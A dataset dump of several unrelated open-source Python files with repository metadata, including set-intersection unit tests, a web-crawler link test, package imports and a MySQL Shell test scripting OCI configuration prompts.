|
ff0c06a54e2a35363e708249ef362923ab8c3b55
| 119
|
py
|
Python
|
__init__.py
|
pingryiRT/P2PPlatform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | null | null | null |
__init__.py
|
pingryiRT/P2PPlatform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | 12
|
2017-09-20T20:34:53.000Z
|
2017-10-30T04:15:07.000Z
|
__init__.py
|
pingryiRT/P2P-Platform
|
c4a1b69d85523687f161074e011a4222fee69ce0
|
[
"Unlicense"
] | null | null | null |
from .Network import Network
from .Peer import Peer
from .Message import Message
from .Message import message_from_xml
| 23.8
| 37
| 0.831933
| 18
| 119
| 5.388889
| 0.333333
| 0.226804
| 0.350515
| 0.494845
| 0.536082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134454
| 119
| 4
| 38
| 29.75
| 0.941748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ff0f89e43e9520d8bd54b73cb3e0f4392aec4e94
| 11,318
|
py
|
Python
|
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
blahb/test/test_intersection.py
|
mvsaha/blahb
|
e4ea703fa0fc255f627057c07df4c51138299d8b
|
[
"MIT"
] | null | null | null |
import numpy as np
from ..flags import *
from ..setops import intersection_
from .utils import *
def test_intersection_NANFIRST():
a = make_indexset([0, 1, 3, 4, 5, 6, 7])
a_data = make_data([na, -3, -6, na, -9, na, 1])
# Overlap | | | |
b = make_indexset( [ 4, 5, 6, 7, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, na, -3, 7])
merge = np.array([DATA_NANFIRST], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7]))
AAE(c.data, T([na, -9, na, 1]))
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, na, -2, -5]))
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, -9, -2, 1]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, -9, -2, -5]))
def test_intersection_NANLAST():
a = make_indexset([0, 1, 3, 4, 5, 6, 7])
a_data = make_data([na, -3, -6, na, -9, na, 1])
# Overlap | | | |
b = make_indexset( [ 4, 5, 6, 7, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, na, -3, 7])
merge = np.array([DATA_NANLAST], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7]))
AAE(c.data, T([na, -9, na, 1]))
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, na, -2, -5]))
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, -9, -2, -5]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7]))
AAE(c.data, T([na, -9, -2, 1]))
def test_intersection_MIN():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_MIN], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
assert c.data is None
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, -5, 3]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, -5, 3]))
def test_intersection_NANMIN():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_NANMIN], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, na, 1, 3]))
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, -2, -5, 10]))
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, -5, 3]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, -5, 3]))
def test_intersection_MAX():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_MAX], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
assert c.data is None
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, 1, 10]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, 1, 10]))
def test_intersection_NANMAX():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_NANMAX], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, na, 1, 3]))
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, -2, -5, 10]))
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, 1, 10]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, 1, 10]))
def test_intersection_SUM():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_SUM], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
assert c.data is None
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, -4, 13]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, na, -4, 13]))
def test_intersection_NANSUM():
a = make_indexset([0, 1, 3, 4, 5, 6, 7, 8])
a_data = make_data([na, -3, -6, na, -9, na, 1, 3])
# Overlap | | | | |
b = make_indexset( [ 4, 5, 6, 7, 8, 9, 10, 11])
b_data = make_data( [na, na, -2, -5, 10, na, -3, 7])
merge = np.array([DATA_NANSUM], dtype=np.uint8)
# Both a and b have no data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
c = intersection_(b, a, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
assert c.data is None
# Only a has data and is first
a.data = a_data
c = intersection_(a, b, merge)
AAE(c.loc, T([4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, na, 1, 3]))
# Only b has data and is last
a.reset_data()
b.data = b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, na, -2, -5, 10]))
# Both a and b have data, a is first
a.data, b.data = a_data, b_data
c = intersection_(a, b, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, -4, 13]))
# Both a and b have data, b is first
c = intersection_(b, a, merge)
AAE(c.loc, T([ 4, 5, 6, 7, 8]))
AAE(c.data, T([na, -9, -2, -4, 13]))
def test_intersection_randomized():
for ndim in range(1, 6):
for _ in range(N_TESTS):
nx, ny = np.random.randint(1, 2 ** ndim, size=2)
x = np.random.randint(0, 3, (nx, ndim), dtype=np.int32)
y = np.random.randint(0, 3, (ny, ndim), dtype=np.int32)
a = IndexSet(x, NO_FLAGS)
b = IndexSet(y, NO_FLAGS)
c = intersection_(a, b)
result = (to_set(a) & to_set(b))
assert to_set(c) == result
assert len(result) == c.n
| 30.839237
| 68
| 0.47853
| 2,016
| 11,318
| 2.601687
| 0.03869
| 0.056435
| 0.036606
| 0.048808
| 0.91878
| 0.890562
| 0.890562
| 0.890562
| 0.890562
| 0.890562
| 0
| 0.075216
| 0.346881
| 11,318
| 366
| 69
| 30.923497
| 0.634334
| 0.141986
| 0
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.0375
| false
| 0
| 0.016667
| 0
| 0.054167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
209ae9cd3ec1fbc399e5b91b5cb8a296c0c62db7
| 282
|
py
|
Python
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 8
|
2019-09-11T15:11:57.000Z
|
2022-02-03T08:24:52.000Z
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 52
|
2019-08-29T00:39:11.000Z
|
2021-01-02T22:49:41.000Z
|
baobab/configs/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 2
|
2019-09-26T23:38:47.000Z
|
2020-02-18T10:07:04.000Z
|
from .parser import BaobabConfig
from . import tdlmc_diagonal_config
from . import tdlmc_cov_config
from . import tdlmc_empirical_config
from . import tdlmc_diagonal_cosmo_config
from . import gamma_diagonal_config
from . import gamma_cov_config
from . import gamma_empirical_config
| 35.25
| 41
| 0.861702
| 40
| 282
| 5.7
| 0.275
| 0.307018
| 0.421053
| 0.276316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109929
| 282
| 8
| 42
| 35.25
| 0.908367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
20e2a2664dce662682fda533cbf51f13b9da0af0
| 92
|
py
|
Python
|
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
trick_sims/Cannon/SIM_cannon_numeric/RUN_test/input.py
|
rmfranz13/trick
|
efffa146e6f235299e5559bf3e65252a0de9aae4
|
[
"NASA-1.3"
] | null | null | null |
exec(open("Modified_data/realtime.py").read())
exec(open("Modified_data/cannon.dr").read())
| 30.666667
| 46
| 0.73913
| 14
| 92
| 4.714286
| 0.642857
| 0.242424
| 0.484848
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 92
| 2
| 47
| 46
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.521739
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
458effe3d1ca449534f0085cc1449dc35615ff94
| 2,710
|
py
|
Python
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | 1
|
2020-11-18T19:41:23.000Z
|
2020-11-18T19:41:23.000Z
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | 20
|
2020-11-19T22:48:25.000Z
|
2021-06-02T03:38:02.000Z
|
domain/test/test_webCrawler.py
|
AntoniPizarro/proyecto_dual
|
53b71a519912b5f79dd2af21db0aad27dfe101c7
|
[
"MIT"
] | null | null | null |
from src.scrappingLinks import webCrawler
import pytest
# pytest -v test/test_webCrawler.py
# AQUI LOS CASOS TEST
# DESDE CADA UNO DE LOS ENLACES DE NUESTRA PÁGINA WEB
@pytest.mark.programaCrawler
def test_indexWebPage():
assert webCrawler("https://proyectodual.000webhostapp.com/index.html") == ['https://proyectodual.000webhostapp.com/index.html', './catalogo.html', 'transports/v-wing.html', '../catalogo.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html']
def test_CatalogoWebPage():
assert webCrawler("https://proyectodual.000webhostapp.com/catalogo.html") == ['https://proyectodual.000webhostapp.com/catalogo.html', 'transports/v-wing.html', "../catalogo.html", 'transports/imperial-shuttle.html', 'transports/gr-75.html', 'transports/crucero-alderaan.html', 'transports/aa-9.html',
'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html', './catalogo.html']
def test_contactoWebPage():
assert webCrawler("https://proyectodual.000webhostapp.com/contacto.html") == ['https://proyectodual.000webhostapp.com/contacto.html', './catalogo.html', 'transports/v-wing.html', '../catalogo.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html']
def test_naveEjemplo():
assert webCrawler("https://proyectodual.000webhostapp.com/transports/y-wing.html") == ['https://proyectodual.000webhostapp.com/transports/y-wing.html', '../catalogo.html', 'transports/v-wing.html', 'transports/imperial-shuttle.html', 'transports/gr-75.html',
'transports/crucero-alderaan.html', 'transports/aa-9.html', 'transports/twilight.html', 'transports/cañonera-republica.html', 'transports/neimoidian-escort.html', 'transports/magna-guard.html', 'transports/t70-xwing.html', 'transports/y-wing.html', './catalogo.html']
| 93.448276
| 358
| 0.669004
| 290
| 2,710
| 6.234483
| 0.193103
| 0.340708
| 0.132743
| 0.146018
| 0.875
| 0.875
| 0.704646
| 0.689712
| 0.63219
| 0.63219
| 0
| 0.019582
| 0.170849
| 2,710
| 28
| 359
| 96.785714
| 0.785047
| 0.038745
| 0
| 0.133333
| 0
| 0
| 0.661284
| 0.418301
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.266667
| true
| 0
| 0.133333
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45c346b6bcf330ea4354ceb34575e1c28f00bdf9
| 146
|
py
|
Python
|
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | null | null | null |
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | 1
|
2021-04-26T04:48:16.000Z
|
2021-04-26T04:48:16.000Z
|
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig # pragma: no cover
class AppConfig(AppConfig): # pragma: no cover
name = 'backend.api' # pragma: no cover
| 24.333333
| 52
| 0.719178
| 20
| 146
| 5.25
| 0.6
| 0.228571
| 0.371429
| 0.419048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184932
| 146
| 5
| 53
| 29.2
| 0.882353
| 0.342466
| 0
| 0
| 0
| 0
| 0.119565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3186641765b59eb0977a40b3133661ae28375d4
| 144
|
py
|
Python
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 152
|
2015-02-08T05:34:06.000Z
|
2022-03-10T01:06:27.000Z
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 35
|
2015-01-03T17:21:38.000Z
|
2021-09-30T21:09:21.000Z
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 31
|
2015-04-25T14:49:07.000Z
|
2021-12-28T17:53:47.000Z
|
from mutant.db.fields.generic import * # NOQA
from mutant.db.fields.python import * # NOQA
from mutant.db.fields.translation import * # NOQA
| 36
| 50
| 0.75
| 21
| 144
| 5.142857
| 0.428571
| 0.277778
| 0.333333
| 0.5
| 0.518519
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 144
| 3
| 51
| 48
| 0.878049
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b36aa1fa58ba2390cd65eb36500f5db1153bfb58
| 7,722
|
py
|
Python
|
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
#@{__python_deps==1}
import os
oci_folder = '.oci';
config_name = 'config'
def_key_name = 'oci_api_key'
def_public_key_name = 'oci_api_key_public'
oci_path = os.path.join(__home, oci_folder);
config_path = os.path.join(oci_path, config_name);
def_key_path = os.path.join(oci_path, def_key_name) + '.pem';
def_public_key_path = os.path.join(oci_path, def_public_key_name) + '.pem';
#@ Test first configuration attempt
testutil.expect_prompt("Please enter your USER OCID:", "invalid-format-ocid");
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "invalid-format-tenancy-id");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "8");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "1");
testutil.expect_prompt("Please enter the number of an option listed above:", "1");
testutil.expect_prompt("Do you want to protect the API key with a passphrase? [Y/n]:", "");
testutil.expect_password("Enter a passphrase for the API key:", "MySamplePwd");
testutil.expect_password("Enter the passphrase again for confirmation:", "UnmatchedPwd");
testutil.expect_password("Enter the passphrase again for confirmation:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci()
print ("OCI Path Exists: %s" % os.path.exists(oci_path));
print ("Config File Exists: %s" % os.path.exists(config_path));
print ("Key Path Exists: %s" % os.path.exists(def_key_path));
print ("Public Key Path Exists: %s" % os.path.exists(def_public_key_path));
with open(config_path, 'r') as file:
print(file.read())
#@ Second configuration attempt, profile already exists
util.configure_oci()
#@ Second configuration attempt, custom region, same key file
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "my-custom-region");
testutil.expect_prompt("Please enter the number of an option listed above:", "1");
testutil.expect_password("The selected API key requires a passphrase:", "WrongPwd");
testutil.expect_password("Wrong passphrase, please try again:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('second')
with open(config_path, 'r') as file:
print(file.read())
#@ Third configuration attempt, creates yet another key file
key_name = 'my_sample_key'
public_key_name = 'my_sample_key_public'
key_path = os.path.join(oci_path, key_name) + '.pem';
public_key_path = os.path.join(oci_path, public_key_name) + '.pem';
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "2");
testutil.expect_prompt("Please enter the number of an option listed above:", "2");
testutil.expect_prompt("Enter the name of the new API key:", "");
testutil.expect_prompt("Enter the name of the new API key:", "invalid key name");
testutil.expect_prompt("Enter the name of the new API key:", def_key_name);
testutil.expect_prompt("Enter the name of the new API key:", key_name);
testutil.expect_prompt("Do you want to protect the API key with a passphrase? [Y/n]:", "n");
util.configure_oci('third')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
print(file.read())
#@ Fourth configuration attempt, uses an existing KEY without password
unexisting_path = os.path.join(oci_path, 'unexisting')
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", "");
testutil.expect_prompt("Enter the location of the existing API key:", oci_path);
testutil.expect_prompt("Enter the location of the existing API key:", unexisting_path);
testutil.expect_prompt("Enter the location of the existing API key:", key_path);
util.configure_oci('fourth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
print(file.read())
#@ Fifth configuration attempt, uses an existing KEY with password, savng password
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", def_key_path);
testutil.expect_password("The selected API key requires a passphrase:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('fifth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
